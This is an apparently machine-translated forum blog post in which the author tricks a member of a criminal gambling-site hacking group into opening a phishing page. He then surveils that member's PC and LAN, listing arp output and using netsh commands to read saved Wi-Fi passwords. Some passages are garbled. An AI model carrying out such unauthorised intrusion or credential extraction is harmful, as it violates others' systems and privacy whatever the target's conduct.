Title: A wonderful story about encountering a certain group and then invading a certain BC intranet

01 Preface

I have been wandering around recently. I happened to meet someone in a group who was hiring programmers to help write Exp and shells. I collected 0days. I also felt that there was no article to write recently, so I tried a big shot in society.

First, let’s ask about the routine and see what he does.

This person wants to find someone to help write batch Exp

Then pretend that I can write, first make a trick, enter the role, and make the other party think that I can really write.

Here, I said I built a site myself for testing, and then asked him to link the shell to try it. Is it OK!

Then the target was not online, and he sent the site I built to the other two of their men.

02 Technology No. 1

This employee of a certain employee of my social worker actually didn't understand technology. He sent my phishing page to two technicians under them. One of them was probably a virtual machine, and the other one was a physical machine. So I only got one fishing here.

There are 2 PCs online here, they have a unified external IP export and the location of Cambodia displays. It is not known whether it is true or not. This person is what we call script kid hacker. Let me show you what information his PC has.

Script Trojan

All kinds of real-name certificates

Various batch hacking tools

Black Hat SEO keywords

Various VPS machines used for invasion

Accounts for various websites

03 Intranet expansion and penetration

Each process has an environment block containing a set of environment variables and their values. There are two types of environment variables, user environment variables and system environment variables.

arp -a took a look. The following machine was discovered. More than 10 units.

192.168.1.1 78-44-fd-fd-55-b9 Dynamic

192.168.1.13 6c-8d-c1-18-aa-b2 Dynamic

192.168.1.24 dc-2b-2a-c2-22-15 Dynamic

192.168.1.42 8c-8e-f2-4f-26-8f Dynamic

192.168.1.54 b0-fc-36-29-f7-ab Dynamic

192.168.1.62 b4-d5-bd-b2-29-e2 Dynamic

192.168.1.81 38-53-9c-ee-31-7e News

192.168.1.83 38-71-de-13-4f-d8 Dynamic

192.168.1.92 cc-29-f5-bc-b8-c1 Dynamic

192.168.1.119 cc-44-63-18-08-4c Dynamic

192.168.1.137 6c-72-e7-5e-f9-7e Dynamic

192.168.1.143 a4-d9-31-89-3d-c4 Dynamic

192.168.1.149 48-3b-38-45-4d-22 Dynamic

192.168.1.171 cc-29-f5-78-70-87 Dynamic

192.168.1.178 00-b3-62-7d-11-f6 Dynamic

192.168.1.206 b0-fc-36-30-79-7b Dynamic

192.168.1.233 e4-f8-9c-9f-61-fe Dynamic

192.168.1.243 dc-41-5f-05-fe-ef Dynamic

192.168.1.255 ff-ff-ff-ff-ff-ff-ff-ff-ff static

224.0.0.22 01-00-5e-00-00-16 Static

224.0.0.252 01-00-5e-00-00-fc Static

224.210.34.44 01-00-5e-52-22-2c Static

239.11.20.1 01-00-5e-0b-14-01 Static

239.255.255.250 01-00-5e-7f-ff-fa Static

255.255.255.255 ff-ff-ff-ff-ff-ff-ff-ff-ff-ff-ff-ff-ff Static

Read the currently calculated WIFI account password to see

netsh wlan show profiles

All user profiles : 2317RL-5G

All user profiles : 2317-ATA-5G

All user profiles : HUAWEI-D91C

All user profiles : TP-LINK_6A68

All user profiles : Airtel-E5573-8318

All user profiles : TP-LINK_88T8

All user profiles : TB-LINK-96A9

netsh wlan show profile name='Enter the configuration file name of the above image'

Continue to collect information

This is a hacker who goes to the network

04 Second

After three days of surveillance, the hacker's profitability was discovered. This person has opened a BC's proxy management platform, as follows:

After analyzing his account, he found that it was an agent account. Then download its APP for analysis. I found that the above are all: time lottery and some gambling games, just like horse racing. But he is a racing car. The background will generate a large number of robots to create many people playing with you.

Robots alone have reached more than 240

There are less than 10 real users online

The hacker's daily work is as follows:

Through 0day vulnerabilities, such as the latest Ueditor upload vulnerability, IIS7.5 parsing vulnerability, DedeCMS exploit vulnerability, and other batch vulnerabilities,

The most commonly used tool is a batch tool

Then upload his BC page, let the user download the APP, and then enter the room he is acting as an agent. In this way, the money the user recharges in the room will be counted on the agent, thereby achieving profitability

As of now, the hacker is still performing IIS7.5 resolution vulnerabilities.

More than 300 w URLs have been imported to batch the upload vulnerability of Ueditor.

Original link address: https://www.hackdoor.org/d/216-bc